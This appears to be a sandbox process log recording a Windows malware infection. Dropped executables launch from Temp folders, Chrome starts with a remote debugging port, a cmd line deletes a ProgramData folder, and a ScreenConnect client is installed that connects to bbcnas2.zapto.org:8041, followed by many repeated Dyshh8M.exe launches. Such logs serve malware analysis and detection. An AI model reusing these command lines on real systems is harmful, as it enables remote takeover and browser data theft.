C:\Users\Admin\AppData\Local\Temp\10000650101\Y9WG5Ep.exe

"C:\Users\Admin\AppData\Local\Temp\10000650101\Y9WG5Ep.exe"

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0xc0,0xc4,0xc8,0x94,0xcc,0x7fef72b9758,0x7fef72b9768,0x7fef72b9778

C:\Windows\system32\ctfmon.exe

ctfmon.exe

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1100 --field-trial-handle=1360,i,7504942727961645950,15316791374823362059,131072 /prefetch:2

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1496 --field-trial-handle=1360,i,7504942727961645950,15316791374823362059,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=1588 --field-trial-handle=1360,i,7504942727961645950,15316791374823362059,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --first-renderer-process --remote-debugging-port=9223 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=2264 --field-trial-handle=1360,i,7504942727961645950,15316791374823362059,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --remote-debugging-port=9223 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=2288 --field-trial-handle=1360,i,7504942727961645950,15316791374823362059,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe

"C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe"

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=angle --use-angle=swiftshader-webgl --mojo-platform-channel-handle=1100 --field-trial-handle=1360,i,7504942727961645950,15316791374823362059,131072 /prefetch:2

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --remote-debugging-port=9223 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --mojo-platform-channel-handle=3300 --field-trial-handle=1360,i,7504942727961645950,15316791374823362059,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=3324 --field-trial-handle=1360,i,7504942727961645950,15316791374823362059,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=1384 --field-trial-handle=1360,i,7504942727961645950,15316791374823362059,131072 /prefetch:8

C:\Users\Admin\AppData\Local\Temp\10003000101\43a951fb75.exe

"C:\Users\Admin\AppData\Local\Temp\10003000101\43a951fb75.exe"

C:\Users\Admin\AppData\Local\Temp\10003000101\43a951fb75.exe

"C:\Users\Admin\AppData\Local\Temp\10003000101\43a951fb75.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1892 -s 508

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3720 --field-trial-handle=1360,i,7504942727961645950,15316791374823362059,131072 /prefetch:8

C:\Users\Admin\AppData\Local\Temp\10008470101\E3WGlpL.exe

"C:\Users\Admin\AppData\Local\Temp\10008470101\E3WGlpL.exe"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\system32\cmd.exe" /c timeout /t 11 & rd /s /q "C:\ProgramData\noh47" & exit

C:\Windows\SysWOW64\timeout.exe

timeout /t 11

C:\Users\Admin\AppData\Local\Temp\10019810101\6NPpGdC.exe

"C:\Users\Admin\AppData\Local\Temp\10019810101\6NPpGdC.exe"

C:\Users\Admin\AppData\Local\Temp\10019810101\6NPpGdC.exe

"C:\Users\Admin\AppData\Local\Temp\10019810101\6NPpGdC.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2024 -s 504

C:\Users\Admin\AppData\Local\Temp\10021570101\VBUN8fn.exe

"C:\Users\Admin\AppData\Local\Temp\10021570101\VBUN8fn.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2840 -s 240

C:\Users\Admin\AppData\Local\Temp\10022320101\67e0HNq.exe

"C:\Users\Admin\AppData\Local\Temp\10022320101\67e0HNq.exe"

C:\Windows\SysWOW64\msiexec.exe

"C:\Windows\System32\msiexec.exe" /i "C:\Users\Admin\AppData\Local\Temp\ScreenConnect\24.4.4.9118\3be09d9e5e840c20\ScreenConnect.ClientSetup.msi"

C:\Windows\system32\msiexec.exe

C:\Windows\system32\msiexec.exe /V

C:\Windows\syswow64\MsiExec.exe

C:\Windows\syswow64\MsiExec.exe -Embedding 892781CF53AD49D0DBD7DC387AB6DC73 C

C:\Windows\SysWOW64\rundll32.exe

rundll32.exe "C:\Users\Admin\AppData\Local\Temp\MSIDA87.tmp",zzzzInvokeManagedCustomActionOutOfProc SfxCA_259513060 1 ScreenConnect.InstallerActions!ScreenConnect.ClientInstallerActions.FixupServiceArguments

C:\Windows\system32\vssvc.exe

C:\Windows\system32\vssvc.exe

C:\Windows\system32\DrvInst.exe

DrvInst.exe "1" "200" "STORAGE\VolumeSnapshot\HarddiskVolumeSnapshot19" "" "" "61530dda3" "0000000000000000" "0000000000000060" "0000000000000560"

C:\Users\Admin\AppData\Local\Temp\10030770101\xqWgymz.exe

"C:\Users\Admin\AppData\Local\Temp\10030770101\xqWgymz.exe"

C:\Windows\syswow64\MsiExec.exe

C:\Windows\syswow64\MsiExec.exe -Embedding 3B85572E27B2AAB122B7715E5ED4A815

C:\Windows\syswow64\MsiExec.exe

C:\Windows\syswow64\MsiExec.exe -Embedding A31261E18EDE542AF332C0E7A64EC7F4 M Global\MSI0000

C:\Program Files (x86)\ScreenConnect Client (3be09d9e5e840c20)\ScreenConnect.ClientService.exe

"C:\Program Files (x86)\ScreenConnect Client (3be09d9e5e840c20)\ScreenConnect.ClientService.exe" "?e=Access&y=Guest&h=bbcnas2.zapto.org&p=8041&s=e228137a-1681-43c0-a833-6e8e39d6fe60&k=BgIAAACkAABSU0ExAAgAAAEAAQBdpn0O4B1VqMLUD0QDsNyYTlq4tRTm9ACUnnSMesFZALDh%2bLgBUwyTJ9D684SXejMRZmxv0Ws0vI2HDF%2f3pgx%2bIGwSyAZ%2fcl0w71rKbKyIIKYDZKbnkGgXvWGAi3ZyQp5OOPPQACb3KOn3dbHGC7zVR4YxQG18q4ph%2fyqoczab4g1p0ctN9m9IinVuQ4spX2nQNInOfCqxjvWdinItao7pk9fPOEV6qP3zSVfOwlnLHbRaASXeN%2fudvdB8e5o68h%2bjKG6VwXtszNJDCo7VtQqZmoYLmAVq9dmcJjckjVt0p%2bJPysj6usBrEV3AzT%2ff7W%2bYHYQ0svZBekSGOWFY8kLf&c=test&c=&c=&c=&c=&c=&c=&c="

C:\Program Files (x86)\ScreenConnect Client (3be09d9e5e840c20)\ScreenConnect.WindowsClient.exe

"C:\Program Files (x86)\ScreenConnect Client (3be09d9e5e840c20)\ScreenConnect.WindowsClient.exe" "RunRole" "4b9ddc8f-c653-45ea-9c82-46ca4caff651" "User"

C:\Program Files (x86)\ScreenConnect Client (3be09d9e5e840c20)\ScreenConnect.WindowsClient.exe

"C:\Program Files (x86)\ScreenConnect Client (3be09d9e5e840c20)\ScreenConnect.WindowsClient.exe" "RunRole" "08e856cc-7b68-40ec-973c-2bb46bb1d75f" "System"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

